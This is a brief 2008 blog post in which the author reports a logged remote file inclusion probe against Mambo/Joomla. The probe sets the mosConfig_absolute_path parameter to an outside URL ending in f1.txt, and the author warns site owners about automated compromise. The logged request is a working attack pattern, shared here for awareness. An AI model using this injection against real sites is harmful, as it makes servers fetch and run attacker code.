Vector of compromise: mosConfig_absolute_path

January 28, 2008 By rjamestaylor

While reviewing my logs for recent hits on my blog I came across the following request:

 URL: /mosConfig_absolute_path%3Dhttp%3A/[...]/f1.txt
 Date: Monday, January 28, 2008 - 05:59
 Remote Host: 69.57.148.17

Fortunately I am not using Mambo or Joomla (though the blog-ware I am using has its own troubles) or I would have been infected with malware that would turn my server into an attack platform for DDoS attacks, spam, IRC, phishing scams and a host of illegal content of all kinds.

So, let me ask you: is your server able to survive such an automated attack as this? Is it already serving illegal purposes?

Share and Enjoy:

Filed Under: How-to, Web, import, robotterror.com

About rjamestaylor

My Tweets

“@RWW: Google Instant will _______” << allow Google to push paid suggestions less obviously than paid results about 43 mins ago
After playing with Google Instant Search it is definitely less predictive than suggestive. A sneaky way to highlight paid search results about 59 mins ago
Just moved GameCenter into my iPhone's "Unused Apple Apps" folder. Folders are great for the undeletable Apple apps about 1 hour ago
Apple sure is insulting—"No Friends"! :'( http://post.ly/wN9h about 1 hour ago
iOS 4.1 installed on my 3GS. WTH is GameCenter? about 1 hour ago
Not that I tried myself, but a "friend" told me trying to search "naughty" terms in Google Instant stops the new feature. about 2 hours ago
If people go with a suggested Google instant search instead of their intended search, is it really predictive or suggestive? about 2 hours ago
“@jackreturns: @rjamestaylor I'm everywhere!” < Jack of all places, but #4sq mayor of none ;). Just need to keep returning :) about 2 hours ago
“@gondoi: iOS 4.1 is now available. Update in T -589.9 Megs” < that's a beefy burger! about 2 hours ago
“@jawar: Genius disturbs the minds of mortal men.” < Mortal men disturb the minds of genius, too about 3 hours ago
Ok, seriously impressed by Google Scribe (http://scribe.google.com) even on my iPad: http://post.ly/wLcA about 4 hours ago
iSSH app update includes lots of goodies like ssh-agent, forwarding and SSH URI support http://post.ly/wKhE about 5 hours ago
Totally Not Safe For Work (due to the RTs of @50cent) @English50cent is awesomely hilarious—does a similar service Xlate geekspeak? about 6 hours ago
Microsoft Visual Studio 2010 Plug-In for the Rackspace Cloud: http://j.mp/cBhKLS about 6 hours ago
Woman is safely rescued by firefighters from swollen Elm Creek in South Bexar County. Great job, teachers! about 6 hours ago
rjamestaylor on Twitter

Bad Behavior has blocked 209 access attempts in the last 7 days.

R James Taylor

Vector of compromise: mosConfig_absolute_path

My Host and Employer

My Tweets